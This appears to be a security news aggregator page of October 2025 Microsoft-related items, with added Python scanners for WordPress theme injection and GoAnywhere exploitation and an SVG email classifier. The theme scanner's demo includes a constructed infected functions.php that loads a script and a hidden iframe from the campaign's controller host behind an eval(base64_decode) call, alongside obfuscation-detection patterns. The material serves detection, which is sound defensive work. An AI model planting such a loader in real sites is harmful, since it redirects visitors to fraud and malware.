
All news with #microsoft tag

Wed, October 8, 2025

Microsoft Enables Default Auto-Archiving in Exchange Online

📥 Microsoft is enabling threshold-based auto-archiving by default for Exchange Online, moving the oldest items to users' archive mailboxes when primary mailbox usage approaches 90%, provided an archive is provisioned and has available space. The Managed Folder Assistant will continuously monitor mailbox sizes and archive until usage drops below the threshold. Rollout begins this month for public clouds and is scheduled for government clouds in November; users can tag items with the Never Move to Archive flag to prevent them from being archived. The change complements recent Defender for Office 365 updates that detect email bombing attacks.


Wed, October 8, 2025

Hackers Inject Redirecting JavaScript via WordPress Themes

🔒 Security researchers warn of an active campaign that modifies WordPress theme files (notably functions.php) to inject malicious JavaScript that redirects visitors to fraudulent verification and malware distribution pages. The injected loader uses obfuscated references to advertising services but posts to a controller domain that serves a remote script from porsasystem[.]com and an iframe mimicking Cloudflare assets. The activity has ties to the Kongtuke traffic distribution system and highlights the need to patch themes, enforce strong credentials, and scan for persistent backdoors.
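A triage scanner for the theme-file injection described above, as an added example that is not code from the researchers' report or from WordPress. It walks wp-content/themes, flags scripts or iframes loaded from hosts outside an allow-list (with the porsasystem[.]com controller host treated as known-bad), and looks for the obfuscation and hiding tricks such loaders rely on. The allow-list, the sample theme files and the temporary directory it builds are constructed for the demo; in practice, point scan_themes at a real themes directory.

```python
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Hosts the site legitimately loads scripts from (constructed for the demo; use your own list).
ALLOWED_HOSTS = {"www.example.com", "fonts.googleapis.com"}
# Controller/payload host named in the campaign report; extend from your own intel.
KNOWN_BAD_HOSTS = {"porsasystem.com"}

SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//([a-z0-9.-]+)", re.I)
IFRAME_SRC_RE = re.compile(
    r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//([a-z0-9.-]+)", re.I)
# Obfuscation and hiding tricks common to injected loaders.
OBFUSCATION_RES = {
    "eval_of_decoded_string": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "hex_escape_run": re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I),
    "fromcharcode": re.compile(r"String\.fromCharCode\s*\(", re.I),
    "hidden_iframe": re.compile(
        r"<iframe\b[^>]*(?:display\s*:\s*none|height\s*=\s*['\"]?0\b)", re.I),
}


def _host_findings(kind: str, hosts) -> List[Tuple[str, str]]:
    """Flag hosts that are known-bad, or simply not on the allow-list."""
    out = []
    for host in sorted({h.lower() for h in hosts}):
        if host in KNOWN_BAD_HOSTS:
            out.append((f"known_bad_{kind}_host", host))
        elif host not in ALLOWED_HOSTS:
            out.append((f"unlisted_{kind}_host", host))
    return out


def scan_text(php: str) -> List[Tuple[str, str]]:
    """Return (finding, evidence) pairs for the contents of one PHP file."""
    findings = []
    findings += _host_findings("script", SCRIPT_SRC_RE.findall(php))
    findings += _host_findings("iframe", IFRAME_SRC_RE.findall(php))
    for name, rx in OBFUSCATION_RES.items():
        m = rx.search(php)
        if m:
            findings.append((name, m.group(0)[:60]))
    return findings


def scan_themes(themes_dir: str) -> Dict[str, List[Tuple[str, str]]]:
    """Walk wp-content/themes and return findings keyed by path relative to it."""
    report = {}
    for root, _dirs, files in os.walk(themes_dir):
        for fn in files:
            if not fn.endswith(".php"):
                continue
            path = os.path.join(root, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                report[os.path.relpath(path, themes_dir).replace(os.sep, "/")] = hits
    return report


CLEAN_FUNCTIONS_PHP = r"""<?php
// constructed sample of a normal theme functions.php
function demo_theme_assets() {
    wp_enqueue_style('demo-theme', get_stylesheet_uri());
    wp_enqueue_script('demo-theme', get_template_directory_uri() . '/js/main.js', array(), '1.0', true);
}
add_action('wp_enqueue_scripts', 'demo_theme_assets');
"""

INFECTED_FUNCTIONS_PHP = CLEAN_FUNCTIONS_PHP + r"""
// constructed sample of the kind of loader appended by the campaign: a remote script
// from the controller host plus a hidden iframe, behind a base64-wrapped eval.
add_action('wp_head', function () {
    echo '<script src="https://porsasystem.com/js/ads-loader.js"></script>';
    echo '<iframe src="//porsasystem.com/cdn-cgi/challenge" style="display:none"></iframe>';
});
eval(base64_decode('ZWNobyAnJzs='));
"""


def demo() -> Dict[str, List[Tuple[str, str]]]:
    """Build a throw-away themes directory with one clean and one infected theme and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for theme, body in (("clean", CLEAN_FUNCTIONS_PHP), ("evil", INFECTED_FUNCTIONS_PHP)):
            os.makedirs(os.path.join(tmp, theme))
            with open(os.path.join(tmp, theme, "functions.php"), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_themes(tmp)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path)
        for name, evidence in hits:
            print(f"  {name}: {evidence}")
```

Findings are heuristics, not proof of compromise: compare any flagged functions.php against the theme vendor's release and check its modification time, and treat a hit on the known-bad host as a confirmed indicator that warrants a full backdoor sweep rather than just deleting the injected lines.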


Tue, October 7, 2025

Disrupting Threats Targeting Microsoft Teams Environments

🛡️ Microsoft Threat Intelligence details how adversaries exploit Microsoft Teams collaboration capabilities—chat, calls, meetings, and screen sharing—at multiple stages of the attack chain. The post chronicles 2024–2025 campaigns and toolsets (phishing, malvertising, deepfakes, device code phishing, and red‑team tool reuse) that enable initial access, persistence, and exfiltration. It emphasizes layered defenses across identity, endpoints, apps, data, and network controls, and provides detection guidance, hunting queries, and product-specific recommendations to help defenders disrupt these operations.


Tue, October 7, 2025

Microsoft SFI Patterns and Practices: New Security Guides

🔐 Microsoft published a second installment of the Secure Future Initiative (SFI) patterns and practices, delivering six practical, practitioner-built guides that address network isolation, tenant hardening, Entra ID app security, Zero Trust for source code access, software supply chain protection, and centralized log collection. Each article outlines the problem, Microsoft’s internal solution, actionable customer guidance, and trade-offs to help teams apply scalable controls across complex, multi-cloud environments.


Tue, October 7, 2025

Microsoft Blocks More Ways to Bypass Windows 11 MSA

🔒 Microsoft is removing further methods that allow creating local accounts and bypassing the Microsoft account requirement during Windows 11 setup. The change appears in Windows 11 Insider Preview Build 26220.6772 (KB5065797) on the Dev Channel and is expected to reach production releases. Microsoft said it will remove known bypass mechanisms from the out-of-box experience (OOBE) because they can skip critical setup screens and leave a device not fully configured. Going forward, OOBE will require internet access and a Microsoft account to complete setup.


Tue, October 7, 2025

Microsoft Links Storm-1175 to GoAnywhere Flaw, Medusa

🔒 Microsoft attributed active exploitation of a critical Fortra GoAnywhere vulnerability (CVE-2025-10035, CVSS 10.0) to the cybercriminal group Storm-1175, which has been observed deploying Medusa ransomware. The flaw is a deserialization bug that can permit unauthenticated command injection when a forged license response signature is accepted. Fortra released fixes in GoAnywhere 7.8.4 and Sustain Release 7.6.3; organizations should apply updates immediately and hunt for indicators such as dropped RMM tools, .jsp web shells, Cloudflare tunnels and Rclone usage.


Mon, October 6, 2025

Inside Microsoft Threat Intelligence: Calm in Chaos

🔎 Microsoft’s Incident Response (IR) team emphasizes calm, clarity, and rapid action when customers encounter major breaches. Adrian Hill explains how IR establishes trust within the first 30 seconds and coordinates with other vendors and stakeholders to stabilize compromised environments. Field discoveries are fed back into Microsoft Threat Intelligence, enabling new detections and product protections. Follow-up recovery, containment, and strategic guidance turn response into lasting partnership.


Mon, October 6, 2025

Critical GoAnywhere MFT Flaw Exploited in Medusa Attacks

⚠️ Microsoft warns that a critical deserialization vulnerability in GoAnywhere MFT (CVE-2025-10035) has been actively exploited by a Medusa ransomware affiliate tracked as Storm-1175 since early September. The License Servlet flaw enables remote compromise without user interaction, allowing attackers to gain initial access and persist via abused RMM tools. Administrators should apply Fortra's patches and inspect logs for SignedObject.getObject stack traces.


Mon, October 6, 2025

Microsoft bug: Multiple Office apps break Copilot pane

🔧 Microsoft is investigating a bug that prevents the Copilot pane and other WebView2-dependent features from launching when multiple Office applications (Excel, Word, PowerPoint, OneNote, Publisher, Access) run concurrently. The issue occurs when one app initializes a WebView2 instance and a second app attempts to start another; closing the first app allows the pane to open normally. The Office team is working on a resolution and will provide updates when available.


Mon, October 6, 2025

Active Exploitation of GoAnywhere CVE-2025-10035 Observed

🔒 Microsoft Threat Intelligence warns of active exploitation of a critical deserialization vulnerability in GoAnywhere MFT License Servlet (CVE-2025-10035, CVSS 10.0) that can allow forged license responses to trigger arbitrary object deserialization and potential remote code execution. Activity attributed to Storm-1175 included initial access via this flaw, deployment of RMM tools (SimpleHelp, MeshAgent), and at least one Medusa ransomware incident. Customers should upgrade per Fortra guidance, run EDR in block mode, restrict outbound connections, and use the provided Defender detections and IoCs for hunting and response.
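The hunting steps listed across the three GoAnywhere items above (the Oct 7 entry and the two Oct 6 entries), as one added example that is not Fortra's or Microsoft's code: look for the SignedObject.getObject frame in the GoAnywhere error log, list .jsp files written to the web root since early September, and check running processes for the RMM and exfiltration tooling named (SimpleHelp, MeshAgent, Cloudflare tunnel, Rclone). The log excerpt, the file index, the process list and the tool-to-process-name mapping are constructed assumptions; only the SignedObject.getObject marker comes from the advisories.

```python
import os
from datetime import datetime, timezone
from typing import Dict, Iterable, List

# The frame Fortra and Microsoft tell admins to look for in GoAnywhere error logs.
TRACE_MARKER = "SignedObject.getObject"

# Post-exploitation tooling named in the summaries, mapped to process names a defender
# would expect on a Windows host. The names are assumptions; confirm against your own telemetry.
SUSPECT_PROCESSES = {
    "SimpleHelp": {"jwrapper-remote access.exe"},
    "MeshAgent": {"meshagent.exe"},
    "Cloudflare tunnel": {"cloudflared.exe"},
    "Rclone": {"rclone.exe"},
}

# Earliest exploitation reported in the summaries ("since early September").
SINCE = datetime(2025, 9, 1, tzinfo=timezone.utc)


def find_deserialization_traces(log_lines: List[str], context: int = 3) -> List[Dict]:
    """Return every line containing the getObject frame plus the lines before it,
    so the error that triggered the trace is visible."""
    hits = []
    for i, line in enumerate(log_lines):
        if TRACE_MARKER in line:
            hits.append({"line": i + 1, "frame": line.strip(),
                         "context": [l.rstrip() for l in log_lines[max(0, i - context):i]]})
    return hits


def index_directory(root: str) -> List[Dict]:
    """Build {path, mtime} entries for every file under root (the GoAnywhere web root in practice)."""
    entries = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            p = os.path.join(dirpath, fn)
            entries.append({"path": p,
                            "mtime": datetime.fromtimestamp(os.stat(p).st_mtime, timezone.utc)})
    return entries


def find_new_jsp_files(entries: Iterable[Dict], since: datetime) -> List[str]:
    """Web shells in this campaign were .jsp files, so list any written on or after `since`."""
    return sorted(e["path"] for e in entries
                  if e["path"].lower().endswith(".jsp") and e["mtime"] >= since)


def find_suspect_processes(process_names: Iterable[str]) -> Dict[str, List[str]]:
    """Map observed process names (case-insensitive) back to the tool they belong to."""
    seen = {p.lower() for p in process_names}
    return {tool: sorted(seen & names) for tool, names in SUSPECT_PROCESSES.items() if seen & names}


def hunt(log_lines: List[str], entries: List[Dict], process_names: List[str], since: datetime) -> Dict:
    return {
        "deserialization_traces": find_deserialization_traces(log_lines),
        "new_jsp_files": find_new_jsp_files(entries, since),
        "suspect_processes": find_suspect_processes(process_names),
    }


# Constructed sample data: a log excerpt in a generic Java log layout (the only frame that
# matters is the real JDK one), a file index for the web root, and a process list.
SAMPLE_LOG = """\
2025-09-10 22:41:02 INFO  license - processing license response
2025-09-10 22:41:03 ERROR license - error handling license response
java.lang.ClassCastException: cannot cast deserialized object (constructed message)
\tat java.base/java.security.SignedObject.getObject(SignedObject.java:179)
\tat app.license.ResponseHandler.handle(ResponseHandler.java:1) (constructed frame)
2025-09-10 22:41:05 INFO  scheduler - nightly cleanup done
""".splitlines()

SAMPLE_FILES = [
    {"path": "webapps/ROOT/index.jsp", "mtime": datetime(2025, 3, 1, tzinfo=timezone.utc)},
    {"path": "webapps/ROOT/images/help.jsp", "mtime": datetime(2025, 9, 11, 1, 7, tzinfo=timezone.utc)},
    {"path": "webapps/ROOT/images/logo.png", "mtime": datetime(2025, 9, 11, 1, 7, tzinfo=timezone.utc)},
]
SAMPLE_PROCESSES = ["java.exe", "MeshAgent.exe", "rclone.exe", "explorer.exe"]


def demo() -> Dict:
    return hunt(SAMPLE_LOG, SAMPLE_FILES, SAMPLE_PROCESSES, SINCE)


if __name__ == "__main__":
    for section, value in demo().items():
        print(section, value)
```

For a real host, read the GoAnywhere log files into find_deserialization_traces, run index_directory against the web root, and feed a tasklist or ps listing into hunt. A getObject trace on an already patched build still records an attempt and is worth reviewing, and a .jsp dropped in a static-asset directory such as images/ is a stronger signal than one in the application's own JSP tree.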


Mon, October 6, 2025

Steam, Microsoft Warn of Unity Flaw Exposing Gamers

⚠️ A code execution vulnerability in Unity's Runtime (CVE-2025-59489) can allow unsafe file loading and local file inclusion, enabling code execution on Android and privilege escalation on Windows. Valve issued a Steam client update that blocks launching custom URI schemes and urges publishers to rebuild with a patched Unity version or replace the UnityPlayer.dll. Microsoft published guidance recommending users uninstall vulnerable games until patched, and Unity advises developers to update the Editor, recompile, and redeploy.


Mon, October 6, 2025

CISA Adds Seven CVEs to Known Exploited Vulnerabilities

🔒 CISA has added seven vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog after observing evidence of active exploitation. The newly listed entries include CVE-2010-3765, CVE-2010-3962, CVE-2011-3402, CVE-2013-3918, CVE-2021-22555, CVE-2021-43226, and CVE-2025-61882, impacting Mozilla, Microsoft, the Linux Kernel, and Oracle E-Business Suite. Federal Civilian Executive Branch agencies must remediate these vulnerabilities under BOD 22-01, and CISA strongly urges all organizations to prioritize timely remediation as part of routine vulnerability management.


Thu, October 2, 2025

Microsoft Outlook stops displaying inline SVG images

🔒 Microsoft will no longer display inline SVG images in Outlook for Web and the new Outlook for Windows; users will instead see blank spaces where those images would have appeared. The global rollout began in early September 2025 and is expected to complete by mid‑October 2025, with Microsoft estimating the change will affect less than 0.1% of images. SVG files sent as classic attachments will continue to be viewable from the attachment well to limit user disruption.
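As an added example (not Microsoft's code) of the distinction the notice draws, the following sorts every SVG in a message into inline markup in the HTML body, an image part that is cid:-referenced or marked inline, or a classic attachment, which is the one form Outlook will keep showing. The sample message is constructed with the standard library; the addresses and file names in it are placeholders.

```python
import email
import re
from email import policy
from email.message import EmailMessage
from typing import Dict, List

SVG_TAG_RE = re.compile(r"<svg\b", re.I)


def classify_svg_parts(raw: bytes) -> Dict[str, List[str]]:
    """Sort every SVG in a raw RFC 5322 message into inline markup, inline image part, or attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    html = body.get_content() if body is not None else ""
    result = {"inline_markup": [], "inline_image": [], "attachment": []}
    # <svg> elements written straight into the HTML body
    result["inline_markup"] = [m.group(0) for m in SVG_TAG_RE.finditer(html)]
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename() or ""
        if part.get_content_type() != "image/svg+xml" and not filename.lower().endswith(".svg"):
            continue
        cid = (part.get("Content-ID") or "").strip().strip("<>")
        # A part the body pulls in via cid: is rendered inline whatever its disposition says.
        referenced = bool(cid) and f"cid:{cid}" in html
        label = filename or cid or part.get_content_type()
        if referenced or part.get_content_disposition() == "inline":
            result["inline_image"].append(label)
        else:
            result["attachment"].append(label)
    return result


def build_sample_message() -> bytes:
    """Constructed message: an HTML body with an <svg> element and a cid-referenced SVG logo,
    plus the same SVG sent as a classic attachment."""
    svg = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
           b'<rect width="10" height="10"/></svg>')
    msg = EmailMessage()
    msg["From"] = "reports@example.com"
    msg["To"] = "user@example.com"
    msg["Subject"] = "SVG handling sample"
    msg.set_content(
        '<html><body><p>Weekly report</p>'
        '<svg xmlns="http://www.w3.org/2000/svg" width="8" height="8"><circle r="4"/></svg>'
        '<img src="cid:logo@example.com" alt="logo"></body></html>',
        subtype="html")
    msg.add_related(svg, maintype="image", subtype="svg+xml",
                    cid="<logo@example.com>", filename="logo.svg", disposition="inline")
    msg.add_attachment(svg, maintype="image", subtype="svg+xml", filename="diagram.svg")
    return msg.as_bytes()


if __name__ == "__main__":
    print(classify_svg_parts(build_sample_message()))
```

Run over a mail archive or at a gateway, this identifies senders whose templates rely on inline SVG and will now render as blank space for Outlook recipients; the attachment list is the set that still works unchanged.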


Thu, October 2, 2025

Microsoft Named a Leader in IDC MarketScape for XDR

🔒 Microsoft has been named a Leader in the IDC MarketScape: Worldwide Extended Detection and Response Software 2025 assessment. Microsoft Defender XDR is highlighted for broad signal coverage across endpoints, identities, email and collaboration, SaaS apps, cloud workloads, and data, plus AI-driven automation and native SIEM integration that consolidate visibility and accelerate response. IDC also cited Microsoft Security Copilot and automatic attack disruption as key differentiators that reduce dwell time and free SOC teams to focus on higher-value tasks.


Thu, October 2, 2025

Microsoft Defender Bug Triggers False BIOS Update Alerts

⚠️ Microsoft is addressing a logic bug in Microsoft Defender for Endpoint that causes some Dell devices' BIOS firmware to be incorrectly marked as outdated, prompting unnecessary update alerts to users. The company says a fix has been developed and is being prepared for deployment, but it has not disclosed the regions or number of customers affected. Microsoft also recently resolved macOS black screen crashes linked to a deadlock in the Apple enterprise security framework and has been correcting several anti-spam and machine-learning false positives impacting Teams and Exchange Online.


Thu, October 2, 2025

ThreatsDay Bulletin: Exploits Target Cars, Cloud, Browsers

🔔 From unpatched vehicles to hijacked clouds, this ThreatsDay bulletin outlines active threats and defensive moves across endpoints, cloud, browsers, and vehicles. Observers reported internet-wide scans exploiting PAN-OS GlobalProtect (CVE-2024-3400) and campaigns that use weak MS‑SQL credentials to deploy XiebroC2 for persistent access. New AirBorne CarPlay/iAP2 flaws can chain to take over Apple CarPlay in some cases without user interaction, while attackers quietly poison browser preferences to sideload malicious extensions. On defence, Google announced AI-driven ransomware detection for Drive and Microsoft plans an Edge revocation feature to curb sideloaded threats.


Wed, October 1, 2025

Microsoft: Classic Outlook Crash Requires Support Ticket

🔧 Microsoft is investigating a known issue that causes classic Outlook on Windows to crash at launch for some Microsoft 365 customers. The vendor has not provided a public fix; affected customers must open a support case in the Microsoft 365 Admin portal so Exchange Online support can request a service change. Microsoft notes the error can stem from different causes but recent cases have involved user mailboxes, and it recommends capturing a Fiddler trace for triage. Temporary workarounds include using new Outlook for Windows or Outlook Web Access until mitigation is applied.


Wed, October 1, 2025

Microsoft to Force-Install Microsoft 365 Companion Apps

📌 Microsoft will automatically install the Microsoft 365 companion apps on Windows 11 devices that have the Microsoft 365 desktop apps, beginning in late October 2025 and completing by the end of December 2025. The suite — People, Files, and Calendar — integrates Copilot for contextual AI assistance from the taskbar. IT admins can opt out via the Microsoft 365 Apps admin center or disable app auto‑launch in each app's Settings.


Wed, October 1, 2025

Microsoft Advances Sentinel with Agentic AI Upgrades

🔒 Microsoft announced major AI upgrades for Sentinel SIEM and Security Copilot, positioning them as agentic platforms. The update makes Sentinel data lake generally available and introduces public-preview releases of Sentinel graph and the Sentinel Model Context Protocol (MCP) Server so AI agents can access and act on SIEM data. Customers can now build custom agents with natural‑language prompts and discover third‑party agents via a revamped store. Microsoft positions agents to automate investigation and response but warns of increased noise, false positives and a new attack surface.


Wed, October 1, 2025

Cybersecurity Awareness Month: Security Starts With You

🔐 As Cybersecurity Awareness Month begins, Microsoft emphasizes that cybersecurity is both a personal and organizational responsibility. The post spotlights the Microsoft Secure Future Initiative (SFI), which has mobilized more than 34,000 engineers to reduce risk and implement protections such as phishing-resistant multifactor authentication on 100% of production system accounts and 92% of employee productivity accounts. It highlights new resources — including the Be Cybersmart Kit and SFI patterns and practices — plus learning paths, scholarships, and programs to help organizations and students improve security skills.
